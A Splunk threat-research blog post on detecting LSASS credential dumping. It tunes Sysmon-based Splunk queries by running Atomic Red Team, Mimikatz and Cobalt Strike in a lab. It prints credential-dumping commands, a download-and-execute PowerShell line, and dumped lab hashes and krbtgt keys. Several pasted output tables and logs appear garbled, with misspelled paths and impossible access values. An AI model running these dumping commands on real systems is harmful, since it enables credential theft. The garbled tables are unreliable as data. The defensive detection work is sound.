

Security APRIL 07, 2022 | 13 MINUTE READ

# You Bet Your Lsass: Hunting LSASS Access



By Splunk Threat Research Team

X f in

One of the most commonly used techniques is to dump credentials after gaining initial access. Adversaries will use one of many ways, but most commonly [Mimikatz](#) is used. Whether it be with PowerShell Invoke-Mimikatz, Cobalt Strike's Mimikatz implementation, or a custom version. All of these methods have a commonality: targeting LSASS. The Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens (per [Wikipedia](#)).

With that, the Splunk Threat Research Team dug into how Mimikatz, and a few other tools found in Atomic Red Team, access credentials via LSASS memory, [T1003.001](#). Part of this process for the Splunk Threat Research Team is to continuously update older analytics to ensure we are providing up to date coverage on latest techniques and behaviors.

To begin, we'll look at our current analytics related to LSASS memory dumping. We will then simulate T1003.001, OS Credential Dumping: LSASS Memory, by using [Mimikatz](#), Cobalt Strike, Atomic Red Team [T1003.001](#), and [Invoke-Mimikatz](#). Last, we will update our current analytics or create new ones.



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## Current Content Review

### Access LSASS Memory for Dump Creation

Our first analytic identifies the image load dbgcore.dll or dbghelp.dll and a TargetImage of lsass.exe. Dbgcore.dll or dbghelp.dll are two core Windows debug DLLs that have minidump functions which provide a way for applications to produce crashdump files that contain a useful subset of the entire process context.

This analytic focuses on the CallTrace and identifies whether dbgcore.dll or dbghelp.dll are loaded to dump credentials.

```
`sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*db  
| stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage  
| rename Computer as dest  
| `security_content_ctime(firstTime)`  
| `security_content_ctime(lastTime)`
```

We found, as we'll show in our simulation, that dbgcore.dll and dbghelp.dll are no longer utilized with the latest version of Mimikatz or Cobalt Strike. However, it still does capture the more basic utilities that access LSASS memory.

### Detect Credential Dumping through LSASS access

This analytic looks for GrantedAccess of 0x1010 or 0x1410 against lsass.exe. These are common access types and it's probably a good time to understand what they are and the common values.

```
`sysmon` EventCode=10 TargetImage=*lsass.exe (GrantedAccess=0x1010 OR GrantedAccess=0  
| stats count min(_time) as firstTime max(_time) as lastTime by Computer, SourceImage  
| rename Computer as dest  
| `security_content_ctime(firstTime)`  
| `security_content_ctime(lastTime)`
```

latest rights request.

GrantedAccess is the requested permissions by the SourceImage into the

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combined to create, for example, 0x1400 (PROCESS\_QUERY\_LIMITED\_INFORMATION and PROCESS\_QUERY\_INFORMATION). You may notice some other common values related to process command-line spoofing (PROCESS\_SUSPEND\_RESUME).

Value	Meaning
PROCESS_ALL_ACCESS (0x1fffff)	All possible access rights for a process object.
PROCESS_CREATE_PROCESS (0x0080)	Required to create a process.
PROCESS_CREATE_THREAD (0x0002)	Required to create a thread.
PROCESS_DUP_HANDLE (0x0040)	Required to duplicate a handle using DuplicateHandle.
PROCESS_QUERY_INFORMATION (0x0400)	Required to retrieve certain information about a process, such as its token, exit code, and priority class (see OpenProcessToken).
PROCESS_QUERY_LIMITED_INFORMATION (0x1000)	Required to retrieve certain information about a process (see GetExitCodeProcess, GetPriorityClass, IsProcessInJob, QueryFullProcessImageName). A handle that has the PROCESS_QUERY_INFORMATION access right is automatically granted PROCESS_QUERY_LIMITED_INFORMATION.
PROCESS_SET_INFORMATION (0x0200)	Required to set certain information about a process, such as its priority class (see SetPriorityClass).
PROCESS_SET_QUOTA (0x0100)	Required to set memory limits using SetProcessWorkingSetSize.
PROCESS_SUSPEND_RESUME (0x0800)	Required to suspend or resume a process.
PROCESS_TERMINATE (0x0001)	Required to terminate a process using TerminateProcess.
PROCESS_VM_OPERATION (0x0008)	Required to perform an operation on the address space of a process (see VirtualProtectEx and WriteProcessMemory).
PROCESS_VM_READ (0x0010)	Required to read memory in a process using ReadProcessMemory.
PROCESS_VM_WRITE (0x0020)	Required to write to memory in a process using WriteProcessMemory.
SYNCHRONIZE (0x00100000L)	Required to wait for the process to terminate using the wait functions.

Now that we have a basic understanding of how these two current analytics work, let's capture data and begin to test them out further.

## Capture Data

To get started with capturing process access event data with Sysmon, we have provided a simple config that identifies TargetImage of lsass.exe. For other EDR products, the name may be similar - [Cross Process Open](#) for Carbon Black, or CrowdStrike Falcon SuspiciousCredentialModuleLoad or LsassHandleFromUnsignedModule (reference Falcon [Data Dictionary](#)).

```
<Sysmon schemaversion="4.81">  
  
<!-- Capture all hashes -->  
  
<HashAlgorithms>md5</HashAlgorithms>  
  
<EventFiltering>  
  
<!-- Event ID 1 == Process Creation. -->
```

```
<!-- Event ID 2 == File Creation Time. -->
```

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```
<!-- Event ID 3 == Network Connection. -->
```

```
<NetworkConnect onmatch="include"/>
```

```
<!-- Event ID 5 == Process Terminated. -->
```

```
<ProcessTerminate onmatch="include"/>
```

```
<!-- Event ID 6 == Driver Loaded.-->
```

```
<DriverLoad onmatch="include"/>
```

```
<!-- Event ID 7 == Image Loaded. -->
```

```
<ImageLoad onmatch="include"/>
```

```
<!-- Event ID 8 == CreateRemoteThread. -->
```

```
<CreateRemoteThread onmatch="include"/>
```

```
<!-- Event ID 9 == RawAccessRead. -->
```

```
<RawAccessRead onmatch="include"/>
```

```
<!-- Event ID 10 == ProcessAccess. -->
```

```
<ProcessAccess onmatch="include">
```

```
<TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
```

```
</ProcessAccess>
```

```
<!-- Event ID 11 == FileCreate. -->
```

```
<FileCreate onmatch="include"/>
```

```
<!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
```

```
<RegistryEvent onmatch="include"/>
```

```
<!-- Event ID 15 == FileStream Created. -->
```

```
<FileStreamHash onmatch="include"/>
```

```
<!-- Event ID 17 == PipeEvent. -->
```

```
<PipeEvent onmatch="include"/>
```

```
</EventFiltering>
```

```
</Sysmon>
```

The [Sysmon Modular](#) project by [Olaf Hartong](#) has some filtering that may be useful to enhance the configuration. In our testing, we utilized an open [Sysmon configuration](#) and the latest [version](#) of Sysmon.

Now we are ready to simulate.

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follow up with Mimikatz, Invoke-Mimikatz, and Cobalt Strike.

## Atomic Red Team

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This instance, we will download all the prerequisites and then run them all.

There are cases where the tests may not complete and may need to be fixed or run manually (this is all based on operating environment variables).

To download [Invoke-Atomicredteam](#) and the Atomic Tests, run the following

```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install.ps1')
Install-AtomicRedTeam -getAtomsics -force
Install prerequisites
Some Atomic tests have prerequisites and it is very simple to get those. This may incur some time.
Invoke-AtomicTest T1003.001 -GetPrereqs
```

PS C:\Users\Administrator> Invoke-AtomicTest T1003.001 -GetPrereqs  
PathToAtomsicsFolder = C:\AtomicRedTeam\atomsics  
Attempting to prereq: Windows Credential Editor  
Prereq already met: Windows Credential Editor must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\ace.exe)  
Attempting to prereq: ProcDump tool From Systeminternals must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\procdump.exe)  
Prereq already met: ProcDump tool From Systeminternals must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\procdump.exe)  
Attempting to prereq: Win32 API Dump LSASS.exe Memory using direct system calls and API unhooking  
Prereq already met: Win32 API Dump LSASS.exe Memory using direct system calls and API unhooking  
Attempting to prereq: Dump executable must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\outflank-dumper.exe)  
Prereq already met: Dumper executable must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\outflank-dumper.exe)  
Attempting to prereq: Nsdump executable must exist on disk at specified location (Sensu\TEMP\nsdump.vsix.exe)  
Prereq already met: Nsdump executable must exist on disk at specified location (Env\TEMP\nsdump.vsix.exe)  
GetPrereq's for: T1003.001-2 Persistence Credential Theft with Mimikatz  
Attempting to prereq: Mimikatz must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\mimikatz.exe)  
Prereq already met: Mimikatz must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\mimikatz.exe)  
Attempting to prereq: Lsass dump must exist at specified location (Ox00\lsass.DMP)  
Prereq already met: Lsass dump must exist at specified location (Ox00\lsass.DMP)  
GetPrereq's for: T1003.001-3 LSASS read with pwntools  
No Prereq Defined  
Attempting to prereq: Computer must have python 3 installed  
Prereq already met: Computer must have python 3 installed  
Attempting to prereq: Python 3 must have pip installed  
Prereq already met: Python 3 must have pip installed  
Attempting to prereq: mimikatz must be installed and part of PATH  
Failed to exec: mimikatz must be installed and part of PATH  
mimikatz was recognized as an internal or external command,  
operable program or batch file  
GetPrereq's for: T1003.001-9 Dump LSASS.exe Memory using Out-Module.ps1  
No Prereq Defined  
GetPrereq's for: T1003.001-10 Create Mini Dump of LSASS.exe using ProcDump  
Attempting to prereq: ProcDump tool From Systeminternals must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\procdump.exe)  
Prereq already met: ProcDump tool From Systeminternals must exist on disk at specified location (C:\AtomicRedTeam\atomsics\T1003.001\bin\procdump.exe)  
GetPrereq's for: T1003.001-11 PowerShell Mimikatz  
No Prereq Defined  
GetPrereq's for: T1003.001-12 Dump LSASS with Net \$ createdump.exe  
Attempting to prereq: Net \$ createdump.exe must exist on disk at specified location (C:\Windows\Temp\createdump.exe)  
Prereq already met: Net \$ createdump.exe must exist on disk at specified location (C:\Windows\Temp\createdump.exe)  
GetPrereq's for: T1003.001-13 Dump LSASS.exe using Impacket Microsoft Lsass  
Attempting to prereq: Impacket Microsoft Lsass must have lsdump.exe  
Prereq already met: Impacket Microsoft Lsass must have lsdump.exe

Now we will invoke T1003.001.

### Invoke-AtomicTest T1003.00

```
PS C:\Users\Administrator> Invoke-AtomicTest T1003.001
PathToAtomsicsFolder = C:\AtomicRedTeam\atomsics
Executing test: T1003.001-1 Windows Credential Editor
Done executing test: T1003.001-1 Windows Credential Editor - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Executing test: T1003.001-2 Dump LSASS.exe Memory using ProcDump
Done executing test: T1003.001-2 Dump LSASS.exe Memory using ProcDump
21:14:58| Dump 1 initiated: C:\Windows\Temp\lsass_dump-8.dmp
21:14:58| Dump 1 completed: Estimated dump file size is 168 MB.
21:14:59| Dump 1 completed: 169 MB written in 0.8 seconds
21:14:59| Dump count reached.

ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

Executing test: T1003.001-3 Dump LSASS.exe Memory using comsvcs.dll
Done executing test: T1003.001-3 Dump LSASS.exe Memory using comsvcs.dll
Remove-Item : Cannot remove item C:\Users\Administrator\AppData\Local\Temp\part-out.txt: The process cannot access the file 'C:\Users\Administrator\AppData\Local\Temp\part-out.txt' because it is being used by another process.
At C:\AtomicRedTeam\Invoke-AtomicTest.ps1:304 char:33
    + Remove-Item $tempFile
    + CategoryInfo          : WriteError: (C:\Users\ADMINI...empart-out.txt:FileInfo) [Remove-Item], IOException
    + FullyQualifiedErrorId : Remove-ItemError, System.IO.IOException
Executing test: T1003.001-4 Dump LSASS.exe Memory using direct system calls and API unhooking
Done executing test: T1003.001-4 Dump LSASS.exe Memory using direct system calls and API unhooking
```

Before we hop into Splunk, let's run the other two simulations.

### Invoke-mimikatz

For invoke-Mimikatz, we utilized Atomic Red Team T1059.001 test number 1. This uses the 2019 version of Mimikatz. Roberto Rodriguez called out the differences in his [blog](#) from 2017 as well, in that older versions request different permissions. Upon successful execution, it will invoke Mimikatz in memory and dump credentials.

```
PS C:\Users\Administrator\Downloads\mimikatz_trunk\x64> Invoke-AtomicTest T1059.001 -TestNumbers 1
PathToAtomsicsFolder = C:\AtomicRedTeam\atomsics

Executing test: T1059.001-1 Mimikatz
Done executing test: T1059.001-1 Mimikatz

    .####, mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
    .## ^ ##, "La Vie, A L'Amour" - (oe.oe)
    ## \ / ##, /*** Benjamin DELPY gentilkiwi` ( benjamin@gentilkiwi.com )
    ## \ / ##, > http://blog.gentilkiwi.com/mimikatz
    ## v ##, Vincent LE TOUQUET ( vincent.letoux@gmail.com )
    #####', > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 48954 (00000000:0000bf3a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : ATTACKRANGE
Logon Server      : (null)
Logon Time        : 1/5/2022 8:19:12 PM
SID               : S-1-5-90-0-1

msv :
[00000003] Primary
  * Username : WIN-DC-1375
  * Domain   : ATTACKRANGE
  * Password  : (null)
kerberos :
  * Username : WIN-DC-1375
  * Domain   : attackrange.local
```

## Mimikatz

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We will run the following variations

```
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

.\mimikatz.exe SEKURLSA::Krbtgt exit

PS C:\Users\Administrator\Downloads\mimikatz_trunk\x64> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
## ^ ##
## /*** A La Vie, A L'Amour" - (oe.eo)
## < > ## /* Benjamin DELPY "gentilkiwi" ( benjamin@gentilkiwi.com )
## v ## > https://blog.gentilkiwi.com/mimikatz
## v ## Vincent LE TOUX ( vincent.letoux@gmail.com )
## ## > https://pingcastle.com / https://mysmartlogon.com ===/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 48954 (00000000:0000bf3a)
Session           : Interactive From 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/5/2022 8:19:12 PM
SID               : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-DC-137$ 
* Domain   : ATTACKRANGE
* NTLM     : fc3470242c5db5888bd63bb169e471d5
* SHA1     : c0c7e88ab57d47cd1e513b29734d5b749f4d704d
tspkg :
wdigest :
* Username : WIN-DC-137$ 
* Domain   : ATTACKRANGE
* Password : (null)
kerberos :
* Username : WIN-DC-137$ 
* Domain   : attackrange.local
* Password : b0 bd 55 69 13 21 a1 bb c6 10 76 52 5a 5e 4c 3d e6 43 22 e9 45 b2 53 95 48 55 4d ec ce aa 38 fe 63 1a 5
3c c3 17 18 25 d9 a3 24 ee 73 00 f9 bf b6 65 ea 09 87 a6 80 11 2f 95 b3 b4 54 bb c8 20 71 a3 71 0c fe 5f 14 e3 25 ae 18 46 89

PS C:\Users\Administrator\Downloads\mimikatz_trunk\x64> .\mimikatz.exe SEKURLSA::Krbtgt exit
mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
## ^ ##
## /*** A La Vie, A L'Amour" - (oe.eo)
## < > ## /* Benjamin DELPY "gentilkiwi" ( benjamin@gentilkiwi.com )
## v ## > https://blog.gentilkiwi.com/mimikatz
## v ## Vincent LE TOUX ( vincent.letoux@gmail.com )
## ## > https://pingcastle.com / https://mysmartlogon.com ===/
mimikatz(commandline) # SEKURLSA::Krbtgt
Current krbtgt: 5 credentials
* rc4_hmac_nt       : 5ffc4fdbb82aa7dd2882d4e98dbf934e
* rc4_hmac_old      : 5ffc4fdbb82aa7dd2882d4e98dbf934e
* rc4_md4          : 5ffc4fdbb82aa7dd2882d4e98dbf934e
* aes256_hmac       : e7c188f7ea617d50ea50f060e77dec23ba0dcc99f5cf16c121ff5e9f7ed96
* aes128_hmac       : c95e828dc9e8966d77deb3407d4b0156

mimikatz(commandline) # exit
Bye!
```

Alright, that finishes our easy tests for Mimikatz.

## Mimikatz and Cobalt Strike

Similarly, run the same commands within a session using Cobalt Strike. The behavior we will look for here is similar to most Cobalt Strike behavior we've identified in the past, a spawned process, default of rundll32.exe, with no command-line arguments, with a process access event targeting LSASS.exe.

```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:

Authentication Id : 0 ; 48986 (00000000:0000bf5a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/18/2022 6:45:04 PM
SID               : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-DC-MHAAG-AT$ 
* Domain   : ATTACKRANGE
* NTLM     : fc3470242c5db5888bd63bb169e471d5
* SHA1     : c0c7e88ab57d47cd1e513b29734d5b749f4d704d
tspkg :
wdigest :
* Username : WIN-DC-MHAAG-AT$ 
* Domain   : ATTACKRANGE
* Password : (null)
kerberos :
* Username : WIN-DC-MHAAG-AT$ 
* Domain   : attackrange.local
* Password : 62 26 2f 24 01 5d a4 a6 50 f5 f8 39 d8 d7 d9 ec
aa 74 a5 44 b6 df 77 44 89 00 a5 4d e2 67 f0 a0 b2 a5 ba d6 b5 28 2c 0
7a cb 80 91 69 55 f4 ab ee e3 a8 78 e6 2b c3 ef 7a 70 d0 4c 56 6f 80 a
db 21 e5 88 92 c9 bb 06 1e ba 93 f7 46
ssp :
```

## Notes on testing

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skips the thorough process and highlights a faster process.

## Continuous Improvement

### Access LSASS Memory for Dump Creation

For our first analytic that focuses on CallTrace image load dbgcore.dll or dbghelp.dll, we found that over time Mimikatz moved away from these two DLLs (dbgcore.dll or dbghelp.dll). The main DLL used by Mimikatz is now ntdll.dll. Ntdll.dll is a native Windows binary that provides similar native API paths to perform credential dumping. For example in the `sekurlsa` module there are many ntdll exported api's, but what stands out is `RtlCopyMemory` which is used to execute the module related to credential dumping.

After simulating the behavior we needed, we get some results

```
`sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*db
| stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage
TargetProcessId, SourceImage, SourceProcessId
| rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_c
dest # TargetImage # TargetProcessId # SourceImage # SourceProcessId # count #
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 644 C:\Windows\system2\lsass.exe 5524 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 644 C:\Windows\system2\lsass.exe 2598 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 644 C:\Windows\system2\lsass.exe 5992 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 644 C:\Windows\system2\lsass.exe 6188 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 644 C:\Windows\Temp\vardump.exe 7008 1
```

In our screenshot, we see some utilities that still use dbgcore.dll or dbghelp.dll when credential dumping occurs. However, we do not see Mimikatz.exe and a few other utilities using dbgcore.dll or dbghelp.dll. Based on CallTraces, we see a pattern of ntdll.dll being used by various credential dumping utilities. If we add ntdll.dll to our current query we get the following results:

```
`sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*db
| stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage,
TargetProcessId, SourceImage, SourceProcessId | rename Computer as dest | `security_content_ctime(firstTime)`
`security_content_ctime(lastTime)`
Could not load lookup LOOKUP_record_type
10,636 events (2/9/21 10:00:00 AM to 2/9/21 10:06:47:00 PM) - No event Sampling *
Events (0,039) Patterns Statistics (18) Visualization
20 Per Page ▾ Format ▾ Preview ▾
dest # TargetImage # TargetProcessId # SourceImage # SourceProcessId # count #
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 7668 2598
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 5568 2598
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 7972 2593
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 6168 2583
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v schost.exe 848 184
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v schost.exe 1548 69
win-host-998 attackrange.local C:\Windows\system2\lsass.exe 624 C:\Windows\System32\v schost.exe 720 36
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v windowsprv.exe 2928 22
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v windowsprv.exe 984 12
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v windowsprv.exe 4960 5
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v windowsprv.exe 1812 2
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 6440 2
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Users\Administrator\Downloads\minikatz_trunk\v4\minikatz.exe 4160 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\system2\lsass.exe 800 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 1812 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 4880 1
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 632 C:\Windows\System32\v rundll32.exe 5888 1
```

We now have a list of processes (source) targeting lsass.exe. Sometimes legitimate applications will request access to lsass.exe for credential access, say to authenticate with AzureCLI or a software deployment application. What will differentiate these? This will be environment dependent based on roles and access associates may have, based on process hierarchy, or GrantedAccess. As we will dig into next, filtering may be much easier once we combine GrantedAccess with CallTrace.

Now we add GrantedAccess to our query to identify any patterns

```
Could not load lookup LOOKUP_record_type
5,366 of 23,032 events matched - No event Sampling *
Events (0,366) Patterns Statistics (29) Visualization
20 Per Page ▾ Format ▾ Preview ▾
dest # TargetImage # GrantedAccess # TargetProcessId # SourceImage # SourceProcessId # count #
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61000 632 C:\Windows\System32\v rundll32.exe 7812 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+124fc\Windows\Syst
61000
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61010 632 C:\Windows\System32\v rundll32.exe 8192 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+210cc\Windows\Syst
8192
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61010 632 C:\Windows\System32\v rundll32.exe 16000 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+210cc\Windows\Syst
16000
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61010 632 C:\Windows\System32\v rundll32.exe 4880 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+210cc\Windows\Syst
4880
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61010 632 C:\Windows\System32\v rundll32.exe 6440 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+210cc\Windows\Syst
6440
win-dc-137 attackrange.local C:\Windows\system2\lsass.exe 61010 632 C:\Windows\System32\v rundll32.exe 7008 C:\Windows\SYSTEM32\msasn1.dll 4114f14cc\Windows\System32\msasn1.dll+210cc\Windows\Syst
7008
```

We can see the permissions being requested by the SourceImage and we

## access

Now our second analytic is focused on GrantedAccess, which we explored

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The base query looks like this with some simulated data

```
| stats count min(_time) as firstTime max(_time) as lastTime by Computer, SourceImageName  
  
| rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_
```

With all the simulation it was easy to spot the patterns between CallTrace and GrantedAccess, so we created a table to showcase these values:

With all this testing, our updated Sysmon query combines the two analytics we set out to enhance by focusing on specific GrantedAccess rights and CallTrace DLLs. Will this catch everything? Probably not, but it will at least catch the majority of tools used and allow us to filter out known good in environments and focus on the rare.

```
`sysmon` EventCode=10 TargetImage=*lsass.exe GrantedAccess IN ("0x01000", "0x1010",
```

contact with LSASS.exe the results are mostly the same.

win-dc-137 attackrange.local	C:\Windows\system32\lsass.exe	0x1010	C:\Users\administrator\Downloads\attackrange_trunk\lsass\lsass.exe	2872	ATTACKRANGE\administrator	NT AUTHORITY\SYSTEM	1
win-dc-137 attackrange.local	C:\Windows\system32\lsass.exe	0x1010	C:\Users\administrator\Downloads\attackrange_trunk\lsass\lsass.exe	7286	ATTACKRANGE\administrator	NT AUTHORITY\SYSTEM	1
win-dc-137 attackrange.local	C:\Windows\system32\lsass.exe	0x1010	C:\Users\administrator\Downloads\attackrange_trunk\lsass\lsass.exe	7286	ATTACKRANGE\administrator	NT AUTHORITY\SYSTEM	1

As noted in our table of CallTrace and GrantedAccess, dependent upon what is being executed with the utility (Mimikatz for example) the access will be different. This was also noted by Roberto Rodriguez [here](#) and Carlos Perez [here](#).

Does this catch every variation of Mimikatz out there? Most likely not. However, it will be a great start to identify uncommon GrantedAccess rights to Lsass.exe. This may be expanded upon or converted to other utilities to assist with detecting suspicious LSASS access.

## Additional Observations

During our simulations we identified behaviors that may assist teams in identifying suspicious SourceUser accessing LSASS. Typically, we will see source NT AUTHORITY\SYSTEM and TargetUser NT AUTHORITY\SYSTEM for normal system process behavior. However, seeing source ATTACKRANGE\administrator and Target NT AUTHORITY\SYSTEM is suspicious.

TargetImage	GrantedAccess	TargetProcessId	SourceImage	SourceProcessId	SourceUser	TargetUser	count
C:\Windows\system32\lsass.exe	0x1010	628	C:\Windows\system32\rundll32.exe	4324	ATTACKRANGE\administrator	NT AUTHORITY\SYSTEM	1
C:\Windows\system32\lsass.exe	0x1010	628	C:\Windows\system32\rundll32.exe	6484	NT AUTHORITY\SYSTEM	NT AUTHORITY\SYSTEM	1

What if an adversary is already elevated? SourceUser will not be a user account, but NT AUTHORITY\SYSTEM. This may be a bit more difficult to detect, but it's worth a hunt.

New Search							
System EventCode=10 TargetImage=~lsass.exe   stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, GrantedAccess, SourceImage, SourceProcessId, SourceUser, TargetUser   rename Computer as _dst   security_content_ctime(firstTime)   security_content_ctime(lastTime)							
✓ 185 events (1/22/2024 00:00:00 PM to 1/22/2024 02:00:00 PM) No Event Sampling ▾							
<a href="#">Events (185)</a> <a href="#">Patterns</a> <a href="#">Statistics (8)</a> <a href="#">Visualization</a>							
20 Per Page ▾ <a href="#">Format</a> <a href="#">Preview</a>							
_dst _ TargetImage GrantedAccess SourceImage SourceProcessId SourceUser TargetUser count							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1000 C:\Windows\system32\rundll32.exe 2428 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1000 C:\Windows\system32\services.exe 644 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1000 C:\Windows\system32\svchost.exe 898 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1000 C:\Windows\system32\svhost.exe 918 NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1000000 C:\Windows\system32\svhost.exe 444 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x10000000 C:\Windows\system32\svhost.exe 594 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\rundll32.exe 2094 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000 C:\Windows\system32\rundll32.exe 2428 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000 C:\Windows\system32\svhost.exe 2499 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 2224 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x10100000 C:\Windows\system32\svhost.exe 428 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000000 C:\Windows\system32\svhost.exe 594 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000001 C:\Windows\system32\svhost.exe 848 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 4							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000001 C:\Windows\system32\svhost.exe 849 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 4							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x101000001 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 4712 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 21							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 2204 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 39							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\svhost.exe 896 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 1							

